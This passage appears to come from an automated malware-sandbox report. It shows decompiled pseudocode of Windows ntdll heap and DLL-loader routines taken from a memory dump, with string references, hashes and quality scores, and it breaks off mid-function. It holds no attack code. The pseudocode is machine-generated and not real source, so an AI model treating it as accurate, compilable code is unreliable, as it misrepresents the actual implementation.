                                            						__eflags =  *(__edx + 2) & 0x00000008;
                                            						if(( *(__edx + 2) & 0x00000008) == 0) {
                                            							_t110 = _t256 + 0xfff; // 0xfe7
                                            							__eflags = (_t110 & 0xfffff000) - __edx;
                                            							if((_t110 & 0xfffff000) != __edx) {
                                            								_t197 =  *[fs:0x30];
                                            								__eflags =  *(_t197 + 0xc);
                                            								if( *(_t197 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E00FEB150();
                                            									_t260 = _t257 + 4;
                                            								} else {
                                            									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            									_t260 = _t257 + 8;
                                            								}
                                            								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                            								E00FEB150();
                                            								_t257 = _t260 + 4;
                                            								__eflags =  *0x10d7bc8;
                                            								if(__eflags == 0) {
                                            									E010A2073(_t206, 1, _t251, __eflags);
                                            								}
                                            								_t235 = _v24;
                                            							}
                                            						}
                                            					}
                                            				}
                                            				_t134 =  *((intOrPtr*)(_t256 + 6));
                                            				if(_t134 == 0) {
                                            					_t210 = _t206;
                                            					_v48 = _t206;
                                            				} else {
                                            					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                            					_v48 = _t210;
                                            				}
                                            				_v5 =  *(_t256 + 2);
                                            				do {
                                            					if(_t235 > 0xfe00) {
                                            						_v12 = 0xfe00;
                                            						__eflags = _t235 - 0xfe01;
                                            						if(_t235 == 0xfe01) {
                                            							_v12 = 0xfdf0;
                                            						}
                                            						_t138 = 0;
                                            					} else {
                                            						_v12 = _t235 & 0x0000ffff;
                                            						_t138 = _v5;
                                            					}
                                            					 *(_t256 + 2) = _t138;
                                            					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                            					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                            					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                            						_t141 = 0;
                                            					} else {
                                            						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                            						_v40 = _t141;
                                            						if(_t141 >= 0xfe) {
                                            							_push(_t210);
                                            							E010AA80D(_t236, _t256, _t210, 0);
                                            							_t141 = _v40;
                                            						}
                                            					}
                                            					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                            					 *((char*)(_t256 + 6)) = _t141;
                                            					_t142 = _v12;
                                            					 *_t256 = _t142;
                                            					 *(_t256 + 3) = 0;
                                            					_t211 = _t142 & 0x0000ffff;
                                            					 *((char*)(_t256 + 7)) = 0;
                                            					_v20 = _t211;
                                            					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                            						_t119 = _t256 + 0x10; // -8
                                            						E0103D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                            						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                            						_t211 = _v20;
                                            					}
                                            					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                            					if(_t252 == 0) {
                                            						L56:
                                            						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                            						_t146 = _t206 + 0xc0;
                                            						goto L19;
                                            					} else {
                                            						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                            							L15:
                                            							_t185 = _t211;
                                            							goto L17;
                                            						} else {
                                            							while(1) {
                                            								_t187 =  *_t252;
                                            								if(_t187 == 0) {
                                            									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                            									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                            									goto L17;
                                            								}
                                            								_t252 = _t187;
                                            								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                            									continue;
                                            								}
                                            								goto L15;
                                            							}
                                            							while(1) {
                                            								L17:
                                            								_t212 = E0100AB40(_t206, _t252, 1, _t185, _t211);
                                            								if(_t212 != 0) {
                                            									_t146 = _t206 + 0xc0;
                                            									break;
                                            								}
                                            								_t252 =  *_t252;
                                            								_t211 = _v20;
                                            								_t185 =  *(_t252 + 0x14);
                                            							}
                                            							L19:
                                            							if(_t146 != _t212) {
                                            								_t237 =  *(_t206 + 0x4c);
                                            								_t253 = _v20;
                                            								while(1) {
                                            									__eflags = _t237;
                                            									if(_t237 == 0) {
                                            										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                            									} else {
                                            										_t184 =  *(_t212 - 8);
                                            										_t237 =  *(_t206 + 0x4c);
                                            										__eflags = _t184 & _t237;
                                            										if((_t184 & _t237) != 0) {
                                            											_t184 = _t184 ^  *(_t206 + 0x50);
                                            											__eflags = _t184;
                                            										}
                                            										_t147 = _t184 & 0x0000ffff;
                                            									}
                                            									__eflags = _t253 - (_t147 & 0x0000ffff);
                                            									if(_t253 <= (_t147 & 0x0000ffff)) {
                                            										goto L20;
                                            									}
                                            									_t212 =  *_t212;
                                            									__eflags = _t206 + 0xc0 - _t212;
                                            									if(_t206 + 0xc0 != _t212) {
                                            										continue;
                                            									} else {
                                            										goto L20;
                                            									}
                                            									goto L56;
                                            								}
                                            							}
                                            							L20:
                                            							_t149 =  *((intOrPtr*)(_t212 + 4));
                                            							_t33 = _t256 + 8; // -16
                                            							_t238 = _t33;
                                            							_t254 =  *_t149;
                                            							if( *_t149 != _t212) {
                                            								_push(_t212);
                                            								E010AA80D(0, _t212, 0, _t254);
                                            							} else {
                                            								 *_t238 = _t212;
                                            								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                            								 *_t149 = _t238;
                                            								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                            							}
                                            							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                            							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                            							if(_t255 == 0) {
                                            								L36:
                                            								if( *(_t206 + 0x4c) != 0) {
                                            									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                            									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                            								}
                                            								_t210 = _v48;
                                            								_t251 = _v12 & 0x0000ffff;
                                            								_t131 = _v20;
                                            								_t235 = _v24 - _t131;
                                            								_v24 = _t235;
                                            								_t256 = _t256 + _t131 * 8;
                                            								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                            									goto L41;
                                            								} else {
                                            									goto L39;
                                            								}
                                            							} else {
                                            								_t216 =  *_t256 & 0x0000ffff;
                                            								_v28 = _t216;
                                            								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                            									L28:
                                            									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                            									_v32 = _t242;
                                            									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                            										_t167 = _t242 + _t242;
                                            									} else {
                                            										_t167 = _t242;
                                            									}
                                            									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                            									_t168 = _t167 << 2;
                                            									_v40 = _t168;
                                            									_t206 = _v44;
                                            									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                            									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                            										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                            									}
                                            									_t217 = _v16;
                                            									if(_t217 != 0) {
                                            										_t173 = _t217 - 8;
                                            										_v52 = _t173;
                                            										_t174 =  *_t173;
                                            										__eflags =  *(_t206 + 0x4c);
                                            										if( *(_t206 + 0x4c) != 0) {
                                            											_t245 =  *(_t206 + 0x50) ^ _t174;
                                            											_v36 = _t245;
                                            											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                            											__eflags = _t245 >> 0x18 - _t225;
                                            											if(_t245 >> 0x18 != _t225) {
                                            												_push(_t225);
                                            												E010AA80D(_t206, _v52, 0, 0);
                                            											}
                                            											_t174 = _v36;
                                            											_t217 = _v16;
                                            											_t242 = _v32;
                                            										}
                                            										_v28 = _v28 - (_t174 & 0x0000ffff);
                                            										__eflags = _v28;
                                            										if(_v28 > 0) {
                                            											goto L34;
                                            										} else {
                                            											goto L33;
                                            										}
                                            									} else {
                                            										L33:
                                            										_t58 = _t256 + 8; // -16
                                            										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                            										_t206 = _v44;
                                            										_t217 = _v16;
                                            										L34:
                                            										if(_t217 == 0) {
                                            											asm("bts eax, edx");
                                            										}
                                            										goto L36;
                                            									}
                                            								} else {
                                            									goto L24;
                                            								}
                                            								while(1) {
                                            									L24:
                                            									_t182 =  *_t255;
                                            									if(_t182 == 0) {
                                            										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                            										__eflags = _t216;
                                            										goto L28;
                                            									}
                                            									_t255 = _t182;
                                            									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                            										continue;
                                            									} else {
                                            										goto L28;
                                            									}
                                            								}
                                            								goto L28;
                                            							}
                                            						}
                                            					}
                                            					L39:
                                            				} while (_t235 != 0);
                                            				_t214 = _v12;
                                            				_t131 =  *(_t206 + 0x54) ^ _t214;
                                            				 *(_t256 + 4) = _t131;
                                            				if(_t214 == 0) {
                                            					__eflags =  *0x10d8748 - 1;
                                            					if( *0x10d8748 >= 1) {
                                            						_t127 = _t256 + 0xfff; // 0xfff
                                            						_t131 = _t127 & 0xfffff000;
                                            						__eflags = _t131 - _t256;
                                            						if(_t131 != _t256) {
                                            							_t156 =  *[fs:0x30];
                                            							__eflags =  *(_t156 + 0xc);
                                            							if( *(_t156 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E00FEB150();
                                            							} else {
                                            								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                            							_t131 = E00FEB150();
                                            							__eflags =  *0x10d7bc8;
                                            							if(__eflags == 0) {
                                            								_t131 = E010A2073(_t206, 1, _t251, __eflags);
                                            							}
                                            						}
                                            					}
                                            				}
                                            				goto L41;
                                            			}
                                            0x0100aad7
                                            0x0100aad9
                                            0x00000000
                                            0x00000000
                                            0x01052361
                                            0x01052369
                                            0x0105236b
                                            0x00000000
                                            0x01052371
                                            0x00000000
                                            0x01052371
                                            0x00000000
                                            0x0105236b
                                            0x0100aac0
                                            0x0100a94a
                                            0x0100a94a
                                            0x0100a94d
                                            0x0100a94d
                                            0x0100a950
                                            0x0100a954
                                            0x01052376
                                            0x01052380
                                            0x0100a95a
                                            0x0100a95a
                                            0x0100a95c
                                            0x0100a95f
                                            0x0100a961
                                            0x0100a961
                                            0x0100a967
                                            0x0100a96a
                                            0x0100a972
                                            0x0100aa02
                                            0x0100aa06
                                            0x0100aa10
                                            0x0100aa16
                                            0x0100aa16
                                            0x0100aa1b
                                            0x0100aa21
                                            0x0100aa24
                                            0x0100aa27
                                            0x0100aa29
                                            0x0100aa2c
                                            0x0100aa32
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0100a978
                                            0x0100a978
                                            0x0100a97b
                                            0x0100a981
                                            0x0100a996
                                            0x0100a998
                                            0x0100a99f
                                            0x0100a9a2
                                            0x0105238a
                                            0x0100a9a8
                                            0x0100a9a8
                                            0x0100a9a8
                                            0x0100a9aa
                                            0x0100a9ad
                                            0x0100a9b0
                                            0x0100a9bb
                                            0x0100a9be
                                            0x0100a9c7
                                            0x0100a9c9
                                            0x0100a9c9
                                            0x0100a9cc
                                            0x0100a9d1
                                            0x0100aa6d
                                            0x0100aa70
                                            0x0100aa73
                                            0x0100aa75
                                            0x0100aa79
                                            0x0100aa7e
                                            0x0100aa82
                                            0x0100aa8f
                                            0x0100aa94
                                            0x0100aa96
                                            0x01052392
                                            0x010523a1
                                            0x010523a1
                                            0x0100aa9c
                                            0x0100aa9f
                                            0x0100aaa2
                                            0x0100aaa2
                                            0x0100aaa8
                                            0x0100aaab
                                            0x0100aaaf
                                            0x00000000
                                            0x0100aab5
                                            0x00000000
                                            0x0100aab5
                                            0x0100a9d7
                                            0x0100a9d7
                                            0x0100a9da
                                            0x0100a9e0
                                            0x0100a9e3
                                            0x0100a9e6
                                            0x0100a9e9
                                            0x0100a9eb
                                            0x0100a9fd
                                            0x0100a9fd
                                            0x00000000
                                            0x0100a9eb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0100a983
                                            0x0100a983
                                            0x0100a983
                                            0x0100a987
                                            0x0100a995
                                            0x0100a995
                                            0x0100a995
                                            0x0100a995
                                            0x0100a989
                                            0x0100a98e
                                            0x00000000
                                            0x0100a990
                                            0x00000000
                                            0x0100a990
                                            0x0100a98e
                                            0x00000000
                                            0x0100a983
                                            0x0100a972
                                            0x0100a90a
                                            0x0100aa34
                                            0x0100aa34
                                            0x0100aa40
                                            0x0100aa43
                                            0x0100aa46
                                            0x0100aa4d
                                            0x010523ab
                                            0x010523b2
                                            0x010523b8
                                            0x010523be
                                            0x010523c3
                                            0x010523c5
                                            0x010523cb
                                            0x010523d1
                                            0x010523d5
                                            0x010523f6
                                            0x010523fb
                                            0x010523d7
                                            0x010523ec
                                            0x010523f1
                                            0x01052403
                                            0x01052408
                                            0x01052410
                                            0x01052417
                                            0x01052422
                                            0x01052422
                                            0x01052417
                                            0x010523c5
                                            0x010523b2
                                            0x00000000

                                            Strings
                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01052403
                                            • HEAP[%wZ]: , xrefs: 010522D7, 010523E7
                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010522F3
                                            • HEAP: , xrefs: 010522E6, 010523F6
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                            • API String ID: 0-1657114761
                                            • Opcode ID: f5c6c97c2b016fe4f9487355fe19219a64f8376ca095c6c8c3748e89dd7e84bc
                                            • Instruction ID: 90adfe1d1205f3aadd832ffe2483cc62af62c0a0e9651938347466a804d85c83
                                            • Opcode Fuzzy Hash: f5c6c97c2b016fe4f9487355fe19219a64f8376ca095c6c8c3748e89dd7e84bc
                                            • Instruction Fuzzy Hash: DFD1BF34B00746DFEB5ACF68C490BAAB7F1BF48300F1585A9D9969B382D334A981CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E0100A229(void* __ecx, void* __edx) {
                                            				signed int _v20;
                                            				char _v24;
                                            				char _v28;
                                            				void* _v44;
                                            				void* _v48;
                                            				void* _v56;
                                            				void* _v60;
                                            				void* __ebx;
                                            				signed int _t55;
                                            				signed int _t57;
                                            				void* _t61;
                                            				intOrPtr _t62;
                                            				void* _t65;
                                            				void* _t71;
                                            				signed char* _t74;
                                            				intOrPtr _t75;
                                            				signed char* _t80;
                                            				intOrPtr _t81;
                                            				void* _t82;
                                            				signed char* _t85;
                                            				signed char _t91;
                                            				void* _t103;
                                            				void* _t105;
                                            				void* _t121;
                                            				void* _t129;
                                            				signed int _t131;
                                            				void* _t133;
                                            
                                            				_t105 = __ecx;
                                            				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                            				_t103 = __edx;
                                            				_t129 = __ecx;
                                            				E0100DF24(__edx,  &_v28, _t133);
                                            				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                            				asm("sbb edi, edi");
                                            				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                            				if(_t55 != 0) {
                                            					_push(0);
                                            					_push(0x14);
                                            					_push( &_v24);
                                            					_push(3);
                                            					_push(_t129);
                                            					_push(0xffffffff);
                                            					_t57 = E01029730();
                                            					__eflags = _t57;
                                            					if(_t57 < 0) {
                                            						L17:
                                            						_push(_t105);
                                            						E010AA80D(_t129, 1, _v20, 0);
                                            						_t121 = 4;
                                            						goto L1;
                                            					}
                                            					__eflags = _v20 & 0x00000060;
                                            					if((_v20 & 0x00000060) == 0) {
                                            						goto L17;
                                            					}
                                            					__eflags = _v24 - _t129;
                                            					if(_v24 == _t129) {
                                            						goto L1;
                                            					}
                                            					goto L17;
                                            				}
                                            				L1:
                                            				_push(_t121);
                                            				_push(0x1000);
                                            				_push(_t133 + 0x14);
                                            				_push(0);
                                            				_push(_t133 + 0x20);
                                            				_push(0xffffffff);
                                            				_t61 = E01029660();
                                            				_t122 = _t61;
                                            				if(_t61 < 0) {
                                            					_t62 =  *[fs:0x30];
                                            					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                            					__eflags =  *(_t62 + 0xc);
                                            					if( *(_t62 + 0xc) == 0) {
                                            						_push("HEAP: ");
                                            						E00FEB150();
                                            					} else {
                                            						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push( *((intOrPtr*)(_t133 + 0xc)));
                                            					_push( *((intOrPtr*)(_t133 + 0x14)));
                                            					_push(_t129);
                                            					E00FEB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                            					_t65 = 0;
                                            					L13:
                                            					return _t65;
                                            				}
                                            				_t71 = E01007D50();
                                            				_t124 = 0x7ffe0380;
                                            				if(_t71 != 0) {
                                            					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				} else {
                                            					_t74 = 0x7ffe0380;
                                            				}
                                            				if( *_t74 != 0) {
                                            					_t75 =  *[fs:0x30];
                                            					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                            					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                            						E010A138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                            					}
                                            				}
                                            				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                            				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                            				if(E01007D50() != 0) {
                                            					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				} else {
                                            					_t80 = _t124;
                                            				}
                                            				if( *_t80 != 0) {
                                            					_t81 =  *[fs:0x30];
                                            					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                            					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                            						__eflags = E01007D50();
                                            						if(__eflags != 0) {
                                            							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            						}
                                            						E010A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                            					}
                                            				}
                                            				_t82 = E01007D50();
                                            				_t125 = 0x7ffe038a;
                                            				if(_t82 != 0) {
                                            					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            				} else {
                                            					_t85 = 0x7ffe038a;
                                            				}
                                            				if( *_t85 != 0) {
                                            					__eflags = E01007D50();
                                            					if(__eflags != 0) {
                                            						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            					}
                                            					E010A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                            				}
                                            				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                            				_t91 =  *(_t103 + 2);
                                            				if((_t91 & 0x00000004) != 0) {
                                            					E0103D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                            					_t91 =  *(_t103 + 2);
                                            				}
                                            				 *(_t103 + 2) = _t91 & 0x00000017;
                                            				_t65 = 1;
                                            				goto L13;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                            • API String ID: 2994545307-2586055223
                                            • Opcode ID: eea6db5837b364e483c6b7347c001ff99e10fb9c58d86ed843a993e5c532baec
                                            • Instruction ID: 3e7ddd4e7cefc712fc385afca1c29e48789812bcbf0fe9290ee29adef6d1b5ce
                                            • Opcode Fuzzy Hash: eea6db5837b364e483c6b7347c001ff99e10fb9c58d86ed843a993e5c532baec
                                            • Instruction Fuzzy Hash: 9D51F5322057819FE352EB68C845F6B7BE8FB80750F0805A9F9D58B2D2D735E800CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 44%
                                            			E01018E00(void* __ecx) {
                                            				signed int _v8;
                                            				char _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t32;
                                            				intOrPtr _t35;
                                            				intOrPtr _t43;
                                            				void* _t46;
                                            				intOrPtr _t47;
                                            				void* _t48;
                                            				signed int _t49;
                                            				void* _t50;
                                            				intOrPtr* _t51;
                                            				signed int _t52;
                                            				void* _t53;
                                            				intOrPtr _t55;
                                            
                                            				_v8 =  *0x10dd360 ^ _t52;
                                            				_t49 = 0;
                                            				_t48 = __ecx;
                                            				_t55 =  *0x10d8464; // 0x75150110
                                            				if(_t55 == 0) {
                                            					L9:
                                            					if( !_t49 >= 0) {
                                            						if(( *0x10d5780 & 0x00000003) != 0) {
                                            							E01065510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                            						}
                                            						if(( *0x10d5780 & 0x00000010) != 0) {
                                            							asm("int3");
                                            						}
                                            					}
                                            					return E0102B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                            				}
                                            				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                            				_t43 =  *0x10d7984; // 0xb92af8
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                            					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                            					if(_t48 == _t43) {
                                            						_t50 = 0x5c;
                                            						if( *_t32 == _t50) {
                                            							_t46 = 0x3f;
                                            							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                            								_t32 = _t32 + 8;
                                            							}
                                            						}
                                            					}
                                            					_t51 =  *0x10d8464; // 0x75150110
                                            					 *0x10db1e0(_t47, _t32,  &_v12);
                                            					_t49 =  *_t51();
                                            					if(_t49 >= 0) {
                                            						L8:
                                            						_t35 = _v12;
                                            						if(_t35 != 0) {
                                            							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                            								E01019B10( *((intOrPtr*)(_t48 + 0x48)));
                                            								_t35 = _v12;
                                            							}
                                            							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                            						}
                                            						goto L9;
                                            					}
                                            					if(_t49 != 0xc000008a) {
                                            						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                            							if(_t49 != 0xc00000bb) {
                                            								goto L8;
                                            							}
                                            						}
                                            					}
                                            					if(( *0x10d5780 & 0x00000005) != 0) {
                                            						_push(_t49);
                                            						E01065510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                            						_t53 = _t53 + 0x1c;
                                            					}
                                            					_t49 = 0;
                                            					goto L8;
                                            				} else {
                                            					goto L9;
                                            				}
                                            			}

                                            Strings
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0105932A
                                            • LdrpFindDllActivationContext, xrefs: 01059331, 0105935D
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 0105933B, 01059367
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 01059357
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 0-3779518884
                                            • Opcode ID: d9cae984b4cc0b0ae58afc7058eb0b37a0e7bbfb67b2ffb17974915386f929a3
                                            • Instruction ID: bf6e8b670d3dce02e4afe05e7e438cb3b972545ec2925168cc7fe27021d82bd1
                                            • Opcode Fuzzy Hash: d9cae984b4cc0b0ae58afc7058eb0b37a0e7bbfb67b2ffb17974915386f929a3
                                            • Instruction Fuzzy Hash: 46411931A003119EDBB5AA1C8849B7A76F4BB01348F05C1ABEDC497599E7789E8083C1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                            • API String ID: 2994545307-336120773
                                            • Opcode ID: dd481e7c5c230bf6d35648b0614d2e90c93b76f3fadb3243c6542444dab99d89
                                            • Instruction ID: 578702495310785289416c4cd3edb78ac4e5358d8733bd4937b345863633b534
                                            • Opcode Fuzzy Hash: dd481e7c5c230bf6d35648b0614d2e90c93b76f3fadb3243c6542444dab99d89
                                            • Instruction Fuzzy Hash: 55313339200111EFD310DB98C896FAB73E8EF00720F5C4099F485DB292D7B8E840D66A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E010099BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                            				char _v5;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed short _v20;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed short _t186;
                                            				intOrPtr _t187;
                                            				signed short _t190;
                                            				signed int _t196;
                                            				signed short _t197;
                                            				intOrPtr _t203;
                                            				signed int _t207;
                                            				signed int _t210;
                                            				signed short _t215;
                                            				intOrPtr _t216;
                                            				signed short _t219;
                                            				signed int _t221;
                                            				signed short _t222;
                                            				intOrPtr _t228;
                                            				signed int _t232;
                                            				signed int _t235;
                                            				signed int _t250;
                                            				signed short _t251;
                                            				intOrPtr _t252;
                                            				signed short _t254;
                                            				intOrPtr _t255;
                                            				signed int _t258;
                                            				signed int _t259;
                                            				signed short _t262;
                                            				intOrPtr _t271;
                                            				signed int _t279;
                                            				signed int _t282;
                                            				signed int _t284;
                                            				signed int _t286;
                                            				intOrPtr _t292;
                                            				signed int _t296;
                                            				signed int _t299;
                                            				signed int _t307;
                                            				signed int* _t309;
                                            				signed short* _t311;
                                            				signed short* _t313;
                                            				signed char _t314;
                                            				intOrPtr _t316;
                                            				signed int _t323;
                                            				signed char _t328;
                                            				signed short* _t330;
                                            				signed char _t331;
                                            				intOrPtr _t335;
                                            				signed int _t342;
                                            				signed char _t347;
                                            				signed short* _t348;
                                            				signed short* _t350;
                                            				signed short _t352;
                                            				signed char _t354;
                                            				intOrPtr _t357;
                                            				intOrPtr* _t364;
                                            				signed char _t365;
                                            				intOrPtr _t366;
                                            				signed int _t373;
                                            				signed char _t378;
                                            				signed int* _t381;
                                            				signed int _t382;
                                            				signed short _t384;
                                            				signed int _t386;
                                            				unsigned int _t390;
                                            				signed int _t393;
                                            				signed int* _t394;
                                            				unsigned int _t398;
                                            				signed short _t400;
                                            				signed short _t402;
                                            				signed int _t404;
                                            				signed int _t407;
                                            				unsigned int _t411;
                                            				signed short* _t414;
                                            				signed int _t415;
                                            				signed short* _t419;
                                            				signed int* _t420;
                                            				void* _t421;
                                            
                                            				_t414 = __edx;
                                            				_t307 = __ecx;
                                            				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
